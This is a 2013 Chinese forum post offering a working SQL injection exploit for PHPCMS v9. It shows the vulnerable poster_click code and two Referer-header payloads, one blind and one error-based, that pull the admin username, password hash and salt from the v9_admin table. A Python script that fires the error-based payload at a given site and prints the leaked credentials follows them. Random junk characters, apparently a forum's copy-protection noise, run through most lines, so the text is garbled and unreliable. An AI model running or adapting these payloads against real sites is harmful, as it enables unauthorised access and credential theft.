有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
! h. c: L. E5 R; c+ x4 K, @* T
问题函数\phpcms\modules\poster\index.php
/ E$ M* b' P) Y/ ?0 x. F# G; l3 w# q1 J4 ~# \
public function poster_click() {7 c# B! r8 y H- y; `: I! R
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
& |9 ~3 P9 s" c0 @2 V& I! Z$r = $this->db->get_one(array('id'=>$id));
0 J! }3 w8 s$ p0 ^if (!is_array($r) && empty($r)) return false;
7 d: S/ ?: L# ^! @5 Z7 z$ip_area = pc_base::load_sys_class('ip_area');
, w! G0 a' l$ T& y$ip = ip();
+ U7 t; K- R! x( |5 |8 h$area = $ip_area->get($ip);
, m4 U% m+ _) D) n \ e& \$username = param::get_cookie('username') ? param::get_cookie('username') : '';
O" ^* v/ i$ N0 H6 [4 i4 i$ J `if($id) {- I. s& o' `& ?$ o9 z) W
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();. s" T3 S1 U X! z1 U2 n: a
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
8 g) z! q3 C( [}
- C( G5 G' ]: q5 J$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
: Y$ L. m" Y. a- Y$setting = string2array($r['setting']); B* A9 s8 N' l1 w
if (count($setting)==1) {5 u# ~8 u+ T# C
$url = $setting['1']['linkurl'];
+ B5 ?* s+ k' x5 I B7 E0 X} else {2 G* g( C- i& G4 \ Z' [
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
+ J+ n# o' ?; a" _}
: c- ^* R0 L' i# g0 ]' mheader('Location: '.$url);
7 {1 ~* L4 M5 w}
/ u+ d4 S2 P+ _# G0 P
$ j' `) U* K8 g9 Z$ |) P % j) d8 ~0 E8 c4 K
( B! ?" l6 s" o3 `利用方式:
1 V$ P, u$ [; L3 F
7 ~0 d1 D- X, W! p8 c1、可以采用盲注入的手法:" W. _) g1 i* X3 h
4 m P! A* N# z u; z! mreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
8 X5 I2 S8 ~% j, Z1 r5 a! y+ k: c( R. ~: r; v; ?2 O
通过返回页面,正常与否一个个猜解密码字段。
3 M: s. g9 i, V- q: k+ L8 U/ F' Q; a% a. F ]3 k2 ~, R: _
2、代码是花开写的,随手附上了:- c7 g% {9 \, L* w. y- Z4 l/ E0 \
1 }$ O5 q: H w1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
* a0 J% M8 [/ [! v( O# v! j g3 f V
此方法是爆错注入手法,原理自查。 x- N3 v) S2 {7 f
8 P k7 J9 C# c" L( P n0 X & R0 b& ?; k7 b9 [+ H$ v/ z: q
% ~6 s' V6 |# ] {/ P
利用程序:9 v' @% Q' Y7 o. P
; i: ?7 H$ Z3 I4 H4 ?' g#!/usr/bin/env python
2 \) e8 s& e6 D; f3 n' R2 w9 q/ nimport httplib,sys,re. n$ T. F% r$ T% b1 Y
( ?( p% O4 g* B l1 Z2 o8 zdef attack():, G: D$ b* G/ X6 @/ V
print “Code by Pax.Mac Team conqu3r!”! H& {4 m3 z& C: W1 D! a! A
print “Welcome to our zone!!!”' @6 F, ]: H$ {& Z
url=sys.argv[1]6 `. h7 { h4 Y# R6 a
paths=sys.argv[2]
/ c2 Q! k& t; P3 Y( |+ ?+ R/ uconn = httplib.HTTPConnection(url)
1 |' ]2 {) a4 Y6 Oi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″," t( n0 {: O- m6 l @) s h
“Accept”: “text/plain”,
. c7 n `5 x" `& }& \“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
6 F/ R; j, z9 W tconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
$ [* r% y" G, M# _6 rr1 = conn.getresponse()8 a2 T) {% t+ n! y5 f; Y J) [; P* @
datas=r1.read()' {1 Y6 m- }& W9 p
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
( C- Q6 S* |8 y% Cprint datas[0]
' X3 y# r) ~% {conn.close(); G* I7 `4 v+ i# e7 U' e+ ~$ [- B2 c
if __name__==”__main__”:$ c& V" ~; |: i
if len(sys.argv)<3:7 X4 S. r2 t* W' Q* j
print “Code by Pax.Mac Team conqu3r”
/ K: d6 v% A" N& l* ?7 dprint “Usgae:”
7 E% ~2 H y) {4 V& a: Z( Xprint “ phpcmsattack.py www.paxmac.org /”1 A! g) o! I* a' J2 A2 K$ P* L
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”: ^7 d. U' S( p( z5 G+ m8 ]
sys.exit(1)
7 J4 e' r0 ^6 `$ M! mattack()
8 M4 [0 ^. m8 I+ t H$ \9 j
( F# U' u0 s6 m! @" {2 h |
发表于 2013-1-11 21:01:00
收藏
支持
反对